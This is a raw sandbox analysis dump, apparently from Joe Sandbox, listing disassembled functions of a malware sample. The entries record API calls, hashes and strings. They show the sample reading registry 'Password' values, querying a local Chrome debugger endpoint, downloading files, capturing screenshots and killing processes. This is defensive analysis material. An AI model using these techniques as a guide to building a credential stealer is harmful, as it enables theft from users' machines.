                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 1530259920-2144369209
                                  • Opcode ID: 99132a768105540de0bb92e0d0ef56e8866f0c1102fa5aad7a32b75ea9d14b12
                                  • Instruction ID: 58f93c7e6ee90de61541002ff6a29de103f51a93fbb18339a6ba235ff8bb7270
                                  • Opcode Fuzzy Hash: 99132a768105540de0bb92e0d0ef56e8866f0c1102fa5aad7a32b75ea9d14b12
                                  • Instruction Fuzzy Hash: 0D511871650205ABDB21DFA8EC45FEEF7F9DB48310F044069F904EB280DBB4EA4897A1
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 003616A1
                                  • lstrcpy.KERNEL32(00000000,00F9B1E8), ref: 003616CC
                                  • lstrlen.KERNEL32(?), ref: 003616D9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003616F6
                                  • lstrcat.KERNEL32(00000000,?), ref: 00361704
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0036172A
                                  • lstrlen.KERNEL32(00FACCA8), ref: 0036173F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00361762
                                  • lstrcat.KERNEL32(00000000,00FACCA8), ref: 0036176A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361792
                                  • ShellExecuteEx.SHELL32(?), ref: 003617CD
                                  • ExitProcess.KERNEL32 ref: 00361803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                  • String ID: <
                                  • API String ID: 3579039295-4251816714
                                  • Opcode ID: aa5907fde7113306278918ebaeb6ef17986668f824439a6626f2dcdeb724e339
                                  • Instruction ID: 2cd236889bccb7e1f525584c7fe080b9ac940949a01c27c493eb5e0b77ccb279
                                  • Opcode Fuzzy Hash: aa5907fde7113306278918ebaeb6ef17986668f824439a6626f2dcdeb724e339
                                  • Instruction Fuzzy Hash: 6F51D571D0121AABCB12DFA4DC88A9EB7F9AF58300F454025F909E7354DF30AE45DBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035EFE4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035F012
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0035F026
                                  • lstrlen.KERNEL32(00000000), ref: 0035F035
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 0035F053
                                  • StrStrA.SHLWAPI(00000000,?), ref: 0035F081
                                  • lstrlen.KERNEL32(?), ref: 0035F094
                                  • lstrlen.KERNEL32(00000000), ref: 0035F0B2
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0035F0FF
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0035F13F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocal
                                  • String ID: ERROR
                                  • API String ID: 1803462166-2861137601
                                  • Opcode ID: c08b3663a9fc04e1cc9cb98d8e9760f3a2fa5836b85f8421673697de5071017d
                                  • Instruction ID: 7f9ce78fb34a48f1af1270aa3fbd7a26bdf718ed96ecece8fd57352500b1594f
                                  • Opcode Fuzzy Hash: c08b3663a9fc04e1cc9cb98d8e9760f3a2fa5836b85f8421673697de5071017d
                                  • Instruction Fuzzy Hash: 9C516C319206059FCB23AF74DC49EAB77E5AF55301F454068FC4AAF262DB30ED558BA0
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(00FA8A18,00579BD8,0000FFFF), ref: 0034A026
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034A053
                                  • lstrlen.KERNEL32(00579BD8), ref: 0034A060
                                  • lstrcpy.KERNEL32(00000000,00579BD8), ref: 0034A08A
                                  • lstrlen.KERNEL32(00374C4C), ref: 0034A095
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034A0B2
                                  • lstrcat.KERNEL32(00000000,00374C4C), ref: 0034A0BE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034A0E4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034A0EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034A114
                                  • SetEnvironmentVariableA.KERNEL32(00FA8A18,00000000), ref: 0034A12F
                                  • LoadLibraryA.KERNEL32(00FAD3D0), ref: 0034A143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: bfda316d1575af30ba64d294950cede3fd6ba2cd7d7d45176ddf8d45adcc3579
                                  • Instruction ID: aa84f8a944c3fb26b1261a39cafc2309e1bc9d4b076e5e6d44f616b146683d31
                                  • Opcode Fuzzy Hash: bfda316d1575af30ba64d294950cede3fd6ba2cd7d7d45176ddf8d45adcc3579
                                  • Instruction Fuzzy Hash: E891C571680E019FD7329FA4EC48A7637E9EB68714F414458F8098F251EFB5EC84EB92
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035C8A2
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035C8D1
                                  • lstrlen.KERNEL32(00000000), ref: 0035C8FC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035C932
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 0035C943
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 42f74cd1f405196e9073a48bcb58bc9364736177391165e5bcae8403f0008c5d
                                  • Instruction ID: e1bb2d8ba67c259e4d3931c320e0f636a3b4b36424350d99348b392750f955bd
                                  • Opcode Fuzzy Hash: 42f74cd1f405196e9073a48bcb58bc9364736177391165e5bcae8403f0008c5d
                                  • Instruction Fuzzy Hash: 5D61B071D21319AFCB12EFB49C48EAE7BF8AF19305F015469EC45EB211D7349949CBA0
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00360CF0), ref: 00364276
                                  • GetDesktopWindow.USER32 ref: 00364280
                                  • GetWindowRect.USER32(00000000,?), ref: 0036428D
                                  • SelectObject.GDI32(00000000,00000000), ref: 003642BF
                                  • GetHGlobalFromStream.COMBASE(00360CF0,?), ref: 00364336
                                  • GlobalLock.KERNEL32(?), ref: 00364340
                                  • GlobalSize.KERNEL32(?), ref: 0036434D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                  • String ID:
                                  • API String ID: 1264946473-0
                                  • Opcode ID: f9abfbd7959c8524a725759e7f703c65313dca98d2d3538ba266f20d83208fd0
                                  • Instruction ID: 16f2e5b7d63368f2f8e3fa89126f64287155d6c88a246516783da995428d6ebe
                                  • Opcode Fuzzy Hash: f9abfbd7959c8524a725759e7f703c65313dca98d2d3538ba266f20d83208fd0
                                  • Instruction Fuzzy Hash: 39513E75A10208AFDB11EFA4EC89EEEB7B9EF58310F104419F905E7250DB34AD45DBA0
                                  APIs
                                  • lstrcat.KERNEL32(?,00FADF28), ref: 0035E00D
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035E037
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E07D
                                  • lstrcat.KERNEL32(?,?), ref: 0035E098
                                  • lstrcat.KERNEL32(?,?), ref: 0035E0AC
                                  • lstrcat.KERNEL32(?,00F9AF90), ref: 0035E0C0
                                  • lstrcat.KERNEL32(?,?), ref: 0035E0D4
                                  • lstrcat.KERNEL32(?,00FAD4B0), ref: 0035E0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0035E126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 4230089145-0
                                  • Opcode ID: f6e4a4f73c330d0f06453037c99c727033a2077595dbc0ab665d3478b637e534
                                  • Instruction ID: 815bdf5185eddc53fbd658c6337c5745c788a1c32a926e98b9e793db99444ced
                                  • Opcode Fuzzy Hash: f6e4a4f73c330d0f06453037c99c727033a2077595dbc0ab665d3478b637e534
                                  • Instruction Fuzzy Hash: 0061AF7191011CABCB16DB64DC48ADE77F8BF58301F5049A5BA09A7350DF70AF89AFA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00346AFF
                                  • InternetOpenA.WININET(0036CFEC,00000001,00000000,00000000,00000000), ref: 00346B2C
                                  • StrCmpCA.SHLWAPI(?,00FAE3C0), ref: 00346B4A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00346B6A
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00346B88
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00346BA1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00346BC6
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00346BF0
                                  • CloseHandle.KERNEL32(00000000), ref: 00346C10
                                  • InternetCloseHandle.WININET(00000000), ref: 00346C17
                                  • InternetCloseHandle.WININET(?), ref: 00346C21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: 66e313e5399e63697eb524794e1e2f170e398d1e14664a98affd35dfac3ad1ad
                                  • Instruction ID: 3f268747ba28e53ee3834e3a02014b5c18264032ee334709e2970c3cb6f67f1d
                                  • Opcode Fuzzy Hash: 66e313e5399e63697eb524794e1e2f170e398d1e14664a98affd35dfac3ad1ad
                                  • Instruction Fuzzy Hash: 3A419271A50205ABDB25DF64EC4AFAE77BCEB14700F004454FA09EB280DF70BD449BA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00354F39), ref: 00364545
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0036454C
                                  • wsprintfW.USER32 ref: 0036455B
                                  • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 003645CA
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 003645D9
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 003645E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                  • String ID: 9O5$%hs$9O5
                                  • API String ID: 885711575-1443274247
                                  • Opcode ID: 1d6efe8a487c9d0ab91a21480905fe562cef30b257049822bdaf2fc465dc61ed
                                  • Instruction ID: ec9e5f4205aa8acea7ef67d103975ecd6abff18aec4cf6be0f89bba88ec56426
                                  • Opcode Fuzzy Hash: 1d6efe8a487c9d0ab91a21480905fe562cef30b257049822bdaf2fc465dc61ed
                                  • Instruction Fuzzy Hash: 1331B172A40205BBDB11DBE0EC49FEEB778FF55700F104055FA0AE7184DB70AA859BA5
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034BC1F
                                  • lstrlen.KERNEL32(00000000), ref: 0034BC52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034BC7C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034BC84
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034BCAC
                                  • lstrlen.KERNEL32(00374AD4), ref: 0034BD23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 85715c14effc143a623728a8df86eb4fd39ef9d4dfbe8d3f432bd2b5d2a65d05
                                  • Instruction ID: 34332e81395a1d9be825e39ddb40a47a73e4837df031a1e18b207d10c1c22472
                                  • Opcode Fuzzy Hash: 85715c14effc143a623728a8df86eb4fd39ef9d4dfbe8d3f432bd2b5d2a65d05
                                  • Instruction Fuzzy Hash: 9BA19230A002058FCB26DF24E989A6EB7F4AF45304F5984A9F809EF361DB31EC55DB60
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00365F2A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00365F49
                                  • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00366014
                                  • memmove.MSVCRT(00000000,00000000,?), ref: 0036609F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003660D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1975243496-4289949731
                                  • Opcode ID: c4f4cdbab6bb5205407dfade9dfcfee462c4bc4f87ae2b28bb843323cd33c6f1
                                  • Instruction ID: 641d93b46609dd4d8bf4174e6c3971fdcfe7646d62e588bc8a23c1af1b18b786
                                  • Opcode Fuzzy Hash: c4f4cdbab6bb5205407dfade9dfcfee462c4bc4f87ae2b28bb843323cd33c6f1
                                  • Instruction Fuzzy Hash: C761A370714604DBDB1ACF5CCC9596EB7BAEF84344B24CA29E492CB789C731ED808B55
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E07D
                                  • lstrcat.KERNEL32(?,?), ref: 0035E098
                                  • lstrcat.KERNEL32(?,?), ref: 0035E0AC
                                  • lstrcat.KERNEL32(?,00F9AF90), ref: 0035E0C0
                                  • lstrcat.KERNEL32(?,?), ref: 0035E0D4
                                  • lstrcat.KERNEL32(?,00FAD4B0), ref: 0035E0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0035E126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFile
                                  • String ID:
                                  • API String ID: 3428472996-0
                                  • Opcode ID: 74dd28f08c55cb8ed5a928d4a6f156333376dca2373f22609271e237ebb768ca
                                  • Instruction ID: db69078057cd402e19b55cc816ae3134057bb6f5b8564fdc9cc16b17d765b9cc
                                  • Opcode Fuzzy Hash: 74dd28f08c55cb8ed5a928d4a6f156333376dca2373f22609271e237ebb768ca
                                  • Instruction Fuzzy Hash: EF41B171D1011C9BCB26EB64DC48ADE73B4BF58311F5049A4F90AAB250DF30AF899FA0
                                  APIs
                                    • Part of subcall function 003477D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00347805
                                    • Part of subcall function 003477D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0034784A
                                    • Part of subcall function 003477D0: StrStrA.SHLWAPI(?,Password), ref: 003478B8
                                    • Part of subcall function 003477D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003478EC
                                    • Part of subcall function 003477D0: HeapFree.KERNEL32(00000000), ref: 003478F3
                                  • lstrcat.KERNEL32(00000000,00374AD4), ref: 00347A90
                                  • lstrcat.KERNEL32(00000000,?), ref: 00347ABD
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00347ACF
                                  • lstrcat.KERNEL32(00000000,?), ref: 00347AF0
                                  • wsprintfA.USER32 ref: 00347B10
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00347B39
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00347B47
                                  • lstrcat.KERNEL32(00000000,00374AD4), ref: 00347B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                  • String ID: :
                                  • API String ID: 398153587-3653984579
                                  • Opcode ID: 055b535074f93bb6107e66c51f1c25445cd6e801543df298ec40b080a25821e8
                                  • Instruction ID: 8493a0aa58b0c4f2c5ed848da5df4634b34471cc50e39115e5c3981cac793db1
                                  • Opcode Fuzzy Hash: 055b535074f93bb6107e66c51f1c25445cd6e801543df298ec40b080a25821e8
                                  • Instruction Fuzzy Hash: 3F31C972A54214EFCB12DF64EC4C9AFB7B9EB94710B154519E90D97300DB70F984EBA0
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 0035820C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00358243
                                  • lstrlen.KERNEL32(00000000), ref: 00358260
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00358297
                                  • lstrlen.KERNEL32(00000000), ref: 003582B4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003582EB
                                  • lstrlen.KERNEL32(00000000), ref: 00358308
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00358337
                                  • lstrlen.KERNEL32(00000000), ref: 00358351
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00358380
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 5531dd07f1e241bdaf82bef086b2febeb9ead9f15ba49e2e22e182f986aa11e7
                                  • Instruction ID: 2d8da6b81a579dac546c45d373bf1e0b34c5c82205ad297801c2f7c945c46cf9
                                  • Opcode Fuzzy Hash: 5531dd07f1e241bdaf82bef086b2febeb9ead9f15ba49e2e22e182f986aa11e7
                                  • Instruction Fuzzy Hash: C9516A799016029BDB12DF28D858A6BBBB8EF04701F124564FD06EB254EF30ED65CBE0
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00347805
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0034784A
                                  • StrStrA.SHLWAPI(?,Password), ref: 003478B8
                                    • Part of subcall function 00347750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0034775E
                                    • Part of subcall function 00347750: RtlAllocateHeap.NTDLL(00000000), ref: 00347765
